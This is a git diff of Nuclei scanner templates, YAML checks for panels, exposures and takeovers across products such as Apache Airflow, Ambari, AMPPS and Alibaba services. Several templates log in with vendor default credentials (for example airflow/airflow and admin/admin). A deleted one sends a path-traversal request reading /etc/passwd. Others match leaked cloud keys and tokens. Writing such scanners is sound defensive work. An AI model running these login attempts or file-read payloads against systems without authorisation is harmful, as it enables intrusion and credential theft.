a/nuclei-templates/Other/airflow-default-login-236.yaml b/nuclei-templates/Other/airflow-default-login-236.yaml new file mode 100644 index 0000000000..772e1ffd78 --- /dev/null +++ b/nuclei-templates/Other/airflow-default-login-236.yaml @@ -0,0 +1,64 @@ +id: airflow-default-login + +info: + name: Apache Airflow Default Login + author: pdteam + severity: high + description: An Apache Airflow default login was discovered. + reference: + - https://airflow.apache.org/docs/apache-airflow/stable/start/docker.html + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L + cvss-score: 8.3 + cwe-id: CWE-522 + metadata: + shodan-query: title:"Sign In - Airflow" + tags: airflow,default-login,apache + +requests: + - raw: + - | + GET /login/ HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + + - | + POST /login/ HTTP/1.1 + Host: {{Hostname}} + Origin: {{BaseURL}} + Content-Type: application/x-www-form-urlencoded + Referer: {{BaseURL}}/admin/airflow/login + + username={{username}}&password={{password}}&_csrf_token={{csrf_token}} + + attack: pitchfork + payloads: + username: + - airflow + password: + - airflow + + cookie-reuse: true + extractors: + - type: regex + name: csrf_token + group: 1 + internal: true + regex: + - 'type="hidden" value="(.*?)">' + + req-condition: true + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'contains(body_1, "Sign In - Airflow")' + - 'contains(all_headers_2, "session=.")' + - 'status_code_2 == 302' + condition: and + + - type: word + words: + - 'You should be redirected automatically to target URL: ' + +# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/airflow-detect-238.yaml b/nuclei-templates/Other/airflow-detect-238.yaml deleted file mode 100644 index 5306691e5b..0000000000 --- a/nuclei-templates/Other/airflow-detect-238.yaml +++ /dev/null @@ -1,24 +0,0 @@ -id: airflow-detect - -info: - name: Apache Airflow - author: pdteam - severity: info - tags: tech,apache,airflow - -requests: - - method: GET - path: - - "{{BaseURL}}/{{randstr}}" - - matchers-condition: and - matchers: - - - type: word - part: body - words: - - "Airflow 404 = lots of circles" - - - type: status - status: - - 404 diff --git a/nuclei-templates/Other/airflow-detect.yaml b/nuclei-templates/Other/airflow-detect.yaml new file mode 100644 index 0000000000..2d90657154 --- /dev/null +++ b/nuclei-templates/Other/airflow-detect.yaml @@ -0,0 +1,27 @@ +id: airflow-detect + +info: + name: Apache Airflow + author: pdteam + severity: info + metadata: + verified: true + shodan-query: http.html:"Apache Airflow" + tags: tech,apache,airflow + +requests: + - method: GET + path: + - "{{BaseURL}}/{{randstr}}" + + matchers-condition: and + matchers: + + - type: word + part: body + words: + - "Airflow 404 = lots of circles" + + - type: status + status: + - 404 diff --git a/nuclei-templates/Other/airflow-panel-241.yaml b/nuclei-templates/Other/airflow-panel.yaml similarity index 100% rename from nuclei-templates/Other/airflow-panel-241.yaml rename to nuclei-templates/Other/airflow-panel.yaml diff --git a/nuclei-templates/Other/akamai-arl-xss-249.yaml b/nuclei-templates/Other/akamai-arl-xss-246.yaml similarity index 100% rename from nuclei-templates/Other/akamai-arl-xss-249.yaml rename to nuclei-templates/Other/akamai-arl-xss-246.yaml diff --git a/nuclei-templates/Other/alfacgiapi-wordpress-257.yaml b/nuclei-templates/Other/alfacgiapi-wordpress-257.yaml new file mode 100644 index 0000000000..271a1c4865 --- /dev/null +++ b/nuclei-templates/Other/alfacgiapi-wordpress-257.yaml @@ -0,0 +1,32 @@ +id: alfacgiapi-wordpress + +info: + name: alfacgiapi + author: pussycat0x + severity: low + description: Searches for sensitive directories present in the ALFA_DATA. + reference: https://www.exploit-db.com/ghdb/6999 + tags: wordpress,listing + +requests: + - method: GET + path: + - "{{BaseURL}}/wp-includes/ALFA_DATA/" + - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" + - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" + matchers-condition: and + matchers: + - type: word + words: + - "Index of" + - type: word + words: + - "/wp-content/plugins/" + - "/wp-includes/ALFA_DATA/" + - "/ALFA_DATA/alfacgiapi/" + - "/cgi-bin/ALFA_DATA/alfacgiapi/" + condition: or + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/alfacgiapi-wordpress.yaml b/nuclei-templates/Other/alfacgiapi-wordpress.yaml deleted file mode 100644 index 27d4456e69..0000000000 --- a/nuclei-templates/Other/alfacgiapi-wordpress.yaml +++ /dev/null @@ -1,32 +0,0 @@ -id: alfacgiapi-wordpress - -info: - name: alfacgiapi - author: pussycat0x - severity: low - description: Searches for sensitive directories present in the ALFA_DATA. - reference: https://www.exploit-db.com/ghdb/6999 - tags: wordpress,listing - -requests: - - method: GET - path: - - "{{BaseURL}}/wp-includes/ALFA_DATA/" - - "{{BaseURL}}/wp-content/uploads/alm_templates/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/ALFA_DATA/alfacgiapi/" - - "{{BaseURL}}/cgi-bin/ALFA_DATA/alfacgiapi/" - matchers-condition: and - matchers: - - type: word - words: - - "Index of" - - type: word - words: - - "/wp-content/plugins/" - - "/wp-includes/ALFA_DATA/" - - "/ALFA_DATA/alfacgiapi/" - - "/cgi-bin/ALFA_DATA/alfacgiapi/" - condition: or - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/alfresco-detect-258.yaml b/nuclei-templates/Other/alfresco-detect-258.yaml deleted file mode 100644 index bb8f41ee52..0000000000 --- a/nuclei-templates/Other/alfresco-detect-258.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: alfresco-detect - -info: - name: Alfresco CMS Detection - author: pathtaga - severity: info - tags: alfresco,tech,panel - -requests: - - method: GET - path: - - "{{BaseURL}}/alfresco/api/-default-/public/cmis/versions/1.1/atom" - - matchers-condition: and - matchers: - - type: word - part: body - words: - - 'org\/alfresco\/api\/opencmis\/OpenCMIS.get' - - - type: word - part: header - words: - - "application/json" - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'Enterprise v.*([0-9]\.[0-9]+\.[0-9]+)' - - 'Community v.*([0-9]\.[0-9]+\.[0-9]+)' - - 'Community Early Access v.*([0-9]\.[0-9]+\.[0-9]+)' diff --git a/nuclei-templates/Other/alfresco-detect.yaml b/nuclei-templates/Other/alfresco-detect.yaml new file mode 100644 index 0000000000..0a9414afb1 --- /dev/null +++ b/nuclei-templates/Other/alfresco-detect.yaml @@ -0,0 +1,43 @@ +id: alfresco-detect + +info: + name: Alfresco CMS Detection + author: pathtaga + description: Alfresco CMS was discovered. + severity: info + tags: alfresco,tech,panel + reference: + - https://www.alfresco.com/ + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}/alfresco/api/-default-/public/cmis/versions/1.1/atom" + + matchers-condition: and + matchers: + - type: word + part: body + words: + - 'org\/alfresco\/api\/opencmis\/OpenCMIS.get' + + - type: word + part: header + words: + - "application/json" + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'Enterprise v.*([0-9]\.[0-9]+\.[0-9]+)' + - 'Community v.*([0-9]\.[0-9]+\.[0-9]+)' + - 'Community Early Access v.*([0-9]\.[0-9]+\.[0-9]+)' + +# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/alibaba-anyproxy-fileread.yaml b/nuclei-templates/Other/alibaba-anyproxy-fileread.yaml deleted file mode 100644 index c22898310b..0000000000 --- a/nuclei-templates/Other/alibaba-anyproxy-fileread.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: Alibaba-Anyproxy-fileRead - -info: - name: Alibaba Anyproxy fetchBody file arbitrary file read - author: str1am - severity: high - reference: - - https://github.com/alibaba/anyproxy/issues/391 - tags: H5AnyproxyS,fileRead - -requests: - - method: GET - path: - - "{{BaseURL}}/fetchBody?id=1/../../../../../../../../etc/passwd" - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "root:x" - - "CONNECT" - part: body - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/alibaba-canal-info-leak-264.yaml b/nuclei-templates/Other/alibaba-canal-info-leak-264.yaml new file mode 100644 index 0000000000..4eac8813a4 --- /dev/null +++ b/nuclei-templates/Other/alibaba-canal-info-leak-264.yaml @@ -0,0 +1,35 @@ +id: alibaba-canal-info-leak + +info: + name: Alibaba Canal Info Leak + author: pikpikcu + severity: info + + reference: + - https://github.com/alibaba/canal/issues/632 + - https://netty.io/wiki/reference-counted-objects.html + - https://my.oschina.net/u/4581879/blog/4753320 + +requests: + - method: GET + path: + - "{{BaseURL}}/api/v1/canal/config/1/1" + headers: + Content-Type: application/json + + matchers-condition: and + matchers: + - type: status + status: + - 200 + - type: word + words: + - "application/json" + condition: and + part: header + - type: word + words: + - "ncanal.aliyun.accessKey" + - "ncanal.aliyun.secretKey" + condition: and + part: body diff --git a/nuclei-templates/Other/alibaba-canal-info-leak.yaml b/nuclei-templates/Other/alibaba-canal-info-leak.yaml deleted file mode 100644 index 0d04d1e1b6..0000000000 --- a/nuclei-templates/Other/alibaba-canal-info-leak.yaml +++ /dev/null @@ -1,35 +0,0 @@ -id: alibaba-canal-info-leak - -info: - name: Alibaba Canal Info Leak - author: pikpikcu - severity: info - reference: - - https://github.com/alibaba/canal/issues/632 - - https://netty.io/wiki/reference-counted-objects.html - - https://my.oschina.net/u/4581879/blog/4753320 - tags: config,exposure,alibaba - -requests: - - method: GET - path: - - "{{BaseURL}}/api/v1/canal/config/1/1" - headers: - Content-Type: application/json - - matchers-condition: and - matchers: - - type: status - status: - - 200 - - type: word - words: - - "application/json" - condition: and - part: header - - type: word - words: - - "ncanal.aliyun.accessKey" - - "ncanal.aliyun.secretKey" - condition: and - part: body diff --git a/nuclei-templates/Other/alibaba-mongoshake-unauth-268.yaml b/nuclei-templates/Other/alibaba-mongoshake-unauth-268.yaml deleted file mode 100644 index 23048a649f..0000000000 --- a/nuclei-templates/Other/alibaba-mongoshake-unauth-268.yaml +++ /dev/null @@ -1,27 +0,0 @@ -id: alibaba-mongoshake-unauth - -info: - name: Alibaba Mongoshake Unauth - author: pikpikcu - severity: info - tags: mongoshake,unauth,alibaba - -requests: - - method: GET - path: - - '{{BaseURL}}/' - - matchers-condition: and - matchers: - - - type: word - words: - - '{"Uri":"/worker","Method":"GET"}' - - type: word - words: - - 'text/plain' - part: header - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/alibaba-mongoshake-unauth-270.yaml b/nuclei-templates/Other/alibaba-mongoshake-unauth-270.yaml new file mode 100644 index 0000000000..6de46b6ec7 --- /dev/null +++ b/nuclei-templates/Other/alibaba-mongoshake-unauth-270.yaml @@ -0,0 +1,27 @@ +id: alibaba-mongoshake-unauth + +info: + name: Alibaba Mongoshake Unauth + author: pikpikcu + severity: info + tags: mongoshake,unauth + +requests: + - method: GET + path: + - '{{BaseURL}}/' + + matchers-condition: and + matchers: + + - type: word + words: + - '{"Uri":"/worker","Method":"GET"}' + - type: word + words: + - 'text/plain' + part: header + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/alphaweb-default-login-275.yaml b/nuclei-templates/Other/alphaweb-default-login-275.yaml new file mode 100644 index 0000000000..6a48f18c6e --- /dev/null +++ b/nuclei-templates/Other/alphaweb-default-login-275.yaml @@ -0,0 +1,43 @@ +id: alphaweb-default-login + +info: + name: AlphaWeb XE Default Login + author: Lark Lab + severity: medium + description: An AlphaWeb XE default login was discovered. + reference: + - https://wiki.zenitel.com/wiki/AlphaWeb + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:N/A:N + cvss-score: 5.8 + cwe-id: CWE-522 + tags: default-login,AlphaWeb + +requests: + - raw: + - | + GET /php/node_info.php HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + Referer: {{BaseURL}} + + attack: pitchfork + payloads: + username: + - admin + password: + - alphaadmin + + matchers-condition: and + matchers: + - type: word + words: + - "HW Configuration" + - "SW Configuration" + condition: and + + - type: status + status: + - 200 + +# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/alphaweb-default-login-277.yaml b/nuclei-templates/Other/alphaweb-default-login-277.yaml deleted file mode 100644 index ead9658955..0000000000 --- a/nuclei-templates/Other/alphaweb-default-login-277.yaml +++ /dev/null @@ -1,30 +0,0 @@ -id: alphaweb-default-login -info: - name: AlphaWeb XE Default Login - author: Lark Lab - severity: medium - tags: default-login - reference: https://wiki.zenitel.com/wiki/AlphaWeb -requests: - - raw: - - | - GET /php/node_info.php HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - Referer: {{BaseURL}} - attack: pitchfork - payloads: - username: - - admin - password: - - alphaadmin - matchers-condition: and - matchers: - - type: word - words: - - "HW Configuration" - - "SW Configuration" - condition: and - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/amazon-mws-auth-token-282.yaml b/nuclei-templates/Other/amazon-mws-auth-token-282.yaml deleted file mode 100644 index 28e8063f5e..0000000000 --- a/nuclei-templates/Other/amazon-mws-auth-token-282.yaml +++ /dev/null @@ -1,15 +0,0 @@ -id: amazon-mws-auth-token -info: - name: Amazon MWS Auth Token - author: puzzlepeaches - severity: info - tags: exposure,token,aws -requests: - - method: GET - path: - - "{{BaseURL}}" - extractors: - - type: regex - part: body - regex: - - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" diff --git a/nuclei-templates/Other/amazon-mws-auth-token.yaml b/nuclei-templates/Other/amazon-mws-auth-token.yaml new file mode 100644 index 0000000000..eb41de1dae --- /dev/null +++ b/nuclei-templates/Other/amazon-mws-auth-token.yaml @@ -0,0 +1,18 @@ +id: amazon-mws-auth-token + +info: + name: Amazon MWS Auth Token + author: puzzlepeaches + severity: info + tags: exposure,token,aws,amazon,auth + +requests: + - method: GET + path: + - "{{BaseURL}}" + + extractors: + - type: regex + part: body + regex: + - "amzn\\.mws\\.[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}" diff --git a/nuclei-templates/Other/ambari-default-credentials-285.yaml b/nuclei-templates/Other/ambari-default-credentials-285.yaml deleted file mode 100644 index cd31405298..0000000000 --- a/nuclei-templates/Other/ambari-default-credentials-285.yaml +++ /dev/null @@ -1,20 +0,0 @@ -id: ambari-default-credentials - -info: - name: Apache Ambari Default Credentials - author: pdteam - severity: medium - tags: ambari,default-login - -requests: - - method: GET - path: - - '{{BaseURL}}/api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name' - headers: - Authorization: "Basic YWRtaW46YWRtaW4=" - matchers: - - type: word - words: - - '"Users" : {' - - 'AMBARI.' - condition: and \ No newline at end of file diff --git a/nuclei-templates/Other/ambari-default-credentials.yaml b/nuclei-templates/Other/ambari-default-credentials.yaml new file mode 100644 index 0000000000..60933a6e9f --- /dev/null +++ b/nuclei-templates/Other/ambari-default-credentials.yaml @@ -0,0 +1,18 @@ +id: ambari-default-credentials +info: + name: Apache Ambari Default Credentials + author: pdteam + severity: medium + tags: ambari,default-login +requests: + - method: GET + path: + - '{{BaseURL}}/api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name' + headers: + Authorization: "Basic YWRtaW46YWRtaW4=" + matchers: + - type: word + words: + - '"Users" : {' + - 'AMBARI.' + condition: and diff --git a/nuclei-templates/Other/ambari-default-login-287.yaml b/nuclei-templates/Other/ambari-default-login-287.yaml new file mode 100644 index 0000000000..2fd02dc340 --- /dev/null +++ b/nuclei-templates/Other/ambari-default-login-287.yaml @@ -0,0 +1,24 @@ +id: ambari-default-login +info: + name: Apache Ambari Default Login + author: pdteam + severity: medium + tags: ambari,default-login,apache +requests: + - raw: + - | + GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1 + Host: {{Hostname}} + Authorization: Basic {{base64(username + ':' + password)}} + payloads: + username: + - admin + password: + - admin + attack: pitchfork + matchers: + - type: word + words: + - '"Users" : {' + - 'AMBARI.' + condition: and diff --git a/nuclei-templates/Other/ambari-default-login.yaml b/nuclei-templates/Other/ambari-default-login.yaml deleted file mode 100644 index 75b4ec03c1..0000000000 --- a/nuclei-templates/Other/ambari-default-login.yaml +++ /dev/null @@ -1,33 +0,0 @@ -id: ambari-default-login -info: - name: Apache Ambari Default Login - author: pdteam - description: An Apache Ambari default admin login was discovered. - severity: high - reference: - - https://ambari.apache.org/1.2.0/installing-hadoop-using-ambari/content/ambari-chap3-1.html - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L - cvss-score: 8.3 - cwe-id: CWE-522 - tags: ambari,default-login,apache -requests: - - raw: - - | - GET /api/v1/users/admin?fields=*,privileges/PrivilegeInfo/cluster_name,privileges/PrivilegeInfo/permission_name HTTP/1.1 - Host: {{Hostname}} - Authorization: Basic {{base64(username + ':' + password)}} - payloads: - username: - - admin - password: - - admin - attack: pitchfork - matchers: - - type: word - words: - - '"Users" : {' - - 'AMBARI.' - condition: and - -# Enhanced by mp on 2022/03/22 diff --git a/nuclei-templates/Other/ambari-exposure-293.yaml b/nuclei-templates/Other/ambari-exposure-293.yaml deleted file mode 100644 index a420d84dba..0000000000 --- a/nuclei-templates/Other/ambari-exposure-293.yaml +++ /dev/null @@ -1,26 +0,0 @@ -id: ambari-exposure - -info: - name: Apache Ambari Exposure Admin Login Panel - author: pdteam - severity: medium - description: An Apache Ambari panel was discovered. - classification: - cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N - cvss-score: 5.3 - cwe-id: CWE-200 - tags: panel,apache,ambari,exposure - -requests: - - method: GET - path: - - '{{BaseURL}}' - - matchers: - - type: word - words: - - 'Ambari' - - 'href="http://www.apache.org/licenses/LICENSE-2.0"' - condition: and - -# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/ambari-exposure.yaml b/nuclei-templates/Other/ambari-exposure.yaml new file mode 100644 index 0000000000..e1db0b3c1f --- /dev/null +++ b/nuclei-templates/Other/ambari-exposure.yaml @@ -0,0 +1,23 @@ +id: ambari-exposure +info: + name: Apache Ambari Exposure Admin Login Panel + author: pdteam + severity: medium + description: An Apache Ambari panel was discovered. + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N + cvss-score: 5.3 + cwe-id: CWE-200 + tags: panel,apache,ambari,exposure +requests: + - method: GET + path: + - '{{BaseURL}}' + matchers: + - type: word + words: + - 'Ambari' + - 'href="http://www.apache.org/licenses/LICENSE-2.0"' + condition: and + +# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/amcrest-login.yaml b/nuclei-templates/Other/amcrest-login.yaml index 1c2714211b..7455bbce1f 100644 --- a/nuclei-templates/Other/amcrest-login.yaml +++ b/nuclei-templates/Other/amcrest-login.yaml @@ -3,16 +3,19 @@ id: amcrest-login info: name: Amcrest Login author: DhiyaneshDK - severity: info description: An Amcrest LDAP user login was discovered. + severity: info reference: - https://www.exploit-db.com/ghdb/7273 - classification: - cwe-id: CWE-200 metadata: shodan-query: html:"amcrest" google-dork: intext:"amcrest" "LDAP User" tags: panel,camera,amcrest + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 requests: - method: GET diff --git a/nuclei-templates/Other/ametys-admin-login-300.yaml b/nuclei-templates/Other/ametys-admin-login-300.yaml deleted file mode 100644 index 7f33273288..0000000000 --- a/nuclei-templates/Other/ametys-admin-login-300.yaml +++ /dev/null @@ -1,36 +0,0 @@ -id: ametys-admin-login - -info: - name: Ametys Admin Login Panel - author: pathtaga - severity: info - description: An Ametys admin login panel was discovered. - classification: - cwe-id: CWE-200 - tags: panel,ametys,cms - -requests: - - method: GET - path: - - '{{BaseURL}}/_admin/index.html' - - matchers-condition: and - matchers: - - type: word - words: - - 'Ametys - Log in' - - '' - condition: or - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - ' ([0-9.]+)' - -# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/ametys-admin-login.yaml b/nuclei-templates/Other/ametys-admin-login.yaml new file mode 100644 index 0000000000..7a96ee1ada --- /dev/null +++ b/nuclei-templates/Other/ametys-admin-login.yaml @@ -0,0 +1,39 @@ +id: ametys-admin-login + +info: + name: Ametys Admin Login Panel + author: pathtaga + severity: info + description: An Ametys admin login panel was discovered. + tags: panel,ametys,cms + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - '{{BaseURL}}/_admin/index.html' + + matchers-condition: and + matchers: + - type: word + words: + - 'Ametys - Log in' + - '' + condition: or + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - ' ([0-9.]+)' + +# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/ampps-admin-panel-304.yaml b/nuclei-templates/Other/ampps-admin-panel-304.yaml deleted file mode 100644 index 1ced15ef7b..0000000000 --- a/nuclei-templates/Other/ampps-admin-panel-304.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: ampps-admin-panel - -info: - name: AMPPS Admin Login Panel - author: deFr0ggy - severity: info - description: An AMPPS Admin login panel was detected. - classification: - cwe-id: CWE-200 - tags: panel,ampps,login - -requests: - - method: GET - path: - - "{{BaseURL}}/ampps-admin/index.php?act=login" - - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - 'Login' - - 'enduser/themes/default/js/universal.js' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'mpps\.com">Powered By FREE ([A-Z 0-9.]+)<\/a>' - -# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/ampps-admin-panel-305.yaml b/nuclei-templates/Other/ampps-admin-panel-305.yaml new file mode 100644 index 0000000000..cd7b7acd7d --- /dev/null +++ b/nuclei-templates/Other/ampps-admin-panel-305.yaml @@ -0,0 +1,43 @@ +id: ampps-admin-panel + +info: + name: AMPPS Admin Login Panel + author: deFr0ggy + severity: info + description: An AMPPS Admin login panel was detected. + tags: panel,ampps,login + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}/ampps-admin/index.php?act=login" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'Login' + - 'enduser/themes/default/js/universal.js' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'mpps\.com">Powered By FREE ([A-Z 0-9.]+)<\/a>' + +# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/ampps-dirlisting-308.yaml b/nuclei-templates/Other/ampps-dirlisting-308.yaml new file mode 100644 index 0000000000..995d6fb8b5 --- /dev/null +++ b/nuclei-templates/Other/ampps-dirlisting-308.yaml @@ -0,0 +1,29 @@ +id: ampps-dirlisting + +info: + name: AMPPS by Softaculous - Directory Listing Enabled + author: deFr0ggy + severity: info + tags: panel,ampps,softaculous,misconfig + +requests: + - method: GET + path: + - "{{BaseURL}}/client/" + - "{{BaseURL}}/files/" + - "{{BaseURL}}/icons/" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - "[AMPPS] - Web Local" + - "Powered by AMPPS" + condition: and + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/ampps-dirlisting.yaml b/nuclei-templates/Other/ampps-dirlisting.yaml deleted file mode 100644 index ad455130e5..0000000000 --- a/nuclei-templates/Other/ampps-dirlisting.yaml +++ /dev/null @@ -1,29 +0,0 @@ -id: ampps-dirlisting - -info: - name: AMPPS by Softaculous - Directory Listing - author: deFr0ggy - severity: info - tags: panel,ampps,softaculous,misconfig - -requests: - - method: GET - path: - - "{{BaseURL}}/client/" - - "{{BaseURL}}/files/" - - "{{BaseURL}}/icons/" - - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - "[AMPPS] - Web Local" - - "Powered by AMPPS" - condition: and - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/ampps-panel-310.yaml b/nuclei-templates/Other/ampps-panel-310.yaml new file mode 100644 index 0000000000..cb84438e15 --- /dev/null +++ b/nuclei-templates/Other/ampps-panel-310.yaml @@ -0,0 +1,43 @@ +id: ampps-panel + +info: + name: AMPPS Login Panel + author: deFr0ggy + severity: info + description: An AMPPS login panel was detected. + tags: panel,ampps,login + classification: + cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:N + cvss-score: 0.0 + cve-id: + cwe-id: CWE-200 + +requests: + - method: GET + path: + - "{{BaseURL}}/ampps/index.php?act=login" + + redirects: true + max-redirects: 2 + matchers-condition: and + matchers: + - type: word + part: body + words: + - '' + - 'Login' + - 'themes/default/images/ampps/favicon.ico' + condition: and + + - type: status + status: + - 200 + + extractors: + - type: regex + part: body + group: 1 + regex: + - 'mpps\.com">Powered By FREE ([A-Z 0-9.]+)<\/a>' + +# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/ampps-panel.yaml b/nuclei-templates/Other/ampps-panel.yaml deleted file mode 100644 index 4a44ba9360..0000000000 --- a/nuclei-templates/Other/ampps-panel.yaml +++ /dev/null @@ -1,40 +0,0 @@ -id: ampps-panel - -info: - name: AMPPS Login Panel - author: deFr0ggy - severity: info - description: An AMPPS login panel was detected. - classification: - cwe-id: CWE-200 - tags: panel,ampps,login - -requests: - - method: GET - path: - - "{{BaseURL}}/ampps/index.php?act=login" - - redirects: true - max-redirects: 2 - matchers-condition: and - matchers: - - type: word - part: body - words: - - '' - - 'Login' - - 'themes/default/images/ampps/favicon.ico' - condition: and - - - type: status - status: - - 200 - - extractors: - - type: regex - part: body - group: 1 - regex: - - 'mpps\.com">Powered By FREE ([A-Z 0-9.]+)<\/a>' - -# Enhanced by mp on 2022/03/16 diff --git a/nuclei-templates/Other/AMSS-sqli.yaml b/nuclei-templates/Other/amss-sqli.yaml similarity index 100% rename from nuclei-templates/Other/AMSS-sqli.yaml rename to nuclei-templates/Other/amss-sqli.yaml diff --git a/nuclei-templates/Other/android-debug-database-exposed-315.yaml b/nuclei-templates/Other/android-debug-database-exposed-315.yaml deleted file mode 100644 index 669be2723a..0000000000 --- a/nuclei-templates/Other/android-debug-database-exposed-315.yaml +++ /dev/null @@ -1,23 +0,0 @@ -id: android-debug-database-exposed - -info: - name: Android Debug Manager - author: dhiyaneshDK - severity: low - reference: https://www.shodan.io/search?query=http.title%3A%22Android+Debug+Database%22 - tags: unauth,android - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - 'Android Debug Database' - - - type: status - status: - - 200 diff --git a/nuclei-templates/Other/android-debug-database-exposed.yaml b/nuclei-templates/Other/android-debug-database-exposed.yaml new file mode 100644 index 0000000000..94bf98c494 --- /dev/null +++ b/nuclei-templates/Other/android-debug-database-exposed.yaml @@ -0,0 +1,24 @@ +id: android-debug-database-exposed + +info: + name: Android Debug Manager + author: dhiyaneshDK + severity: low + reference: + - https://www.shodan.io/search?query=http.title%3A%22Android+Debug+Database%22 + tags: unauth,android + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'Android Debug Database' + + - type: status + status: + - 200 diff --git a/nuclei-templates/Other/anima-takeover-319.yaml b/nuclei-templates/Other/anima-takeover.yaml similarity index 100% rename from nuclei-templates/Other/anima-takeover-319.yaml rename to nuclei-templates/Other/anima-takeover.yaml diff --git a/nuclei-templates/Other/announcekit-takeover-324.yaml b/nuclei-templates/Other/announcekit-takeover-324.yaml index b0eaa68779..37a662aa98 100644 --- a/nuclei-templates/Other/announcekit-takeover-324.yaml +++ b/nuclei-templates/Other/announcekit-takeover-324.yaml @@ -1,25 +1,25 @@ -id: announcekit-takeover - -info: - name: Announcekit Takeover Detection - author: melbadry9 - severity: high - tags: takeover,announcekit - reference: - - https://blog.melbadry9.xyz/dangling-dns/xyz-services/dangling-dns-announcekit - - https://github.com/EdOverflow/can-i-take-over-xyz/issues/228 - -requests: - - method: GET - path: - - "{{BaseURL}}" - - matchers-condition: and - matchers: - - type: word - words: - - 'Error 404 - AnnounceKit' - - - type: status - status: - - 404 +id: announcekit-takeover + +info: + name: Announcekit Takeover Detection + author: melbadry9 + severity: high + tags: takeover,announcekit + reference: + - https://blog.melbadry9.xyz/dangling-dns/xyz-services/dangling-dns-announcekit + - https://github.com/EdOverflow/can-i-take-over-xyz/issues/228 + +requests: + - method: GET + path: + - "{{BaseURL}}" + + matchers-condition: and + matchers: + - type: word + words: + - 'Error 404 - AnnounceKit' + + - type: status + status: + - 404 diff --git a/nuclei-templates/Other/ansible-semaphore-panel-327.yaml b/nuclei-templates/Other/ansible-semaphore-panel-327.yaml new file mode 100644 index 0000000000..3d5fb94471 --- /dev/null +++ b/nuclei-templates/Other/ansible-semaphore-panel-327.yaml @@ -0,0 +1,34 @@ +id: ansible-semaphore-panel + +info: + name: Ansible Semaphore Panel Detect + author: Yuzhe-zhang-0 + description: An Ansible Semaphore login panel was detected. + 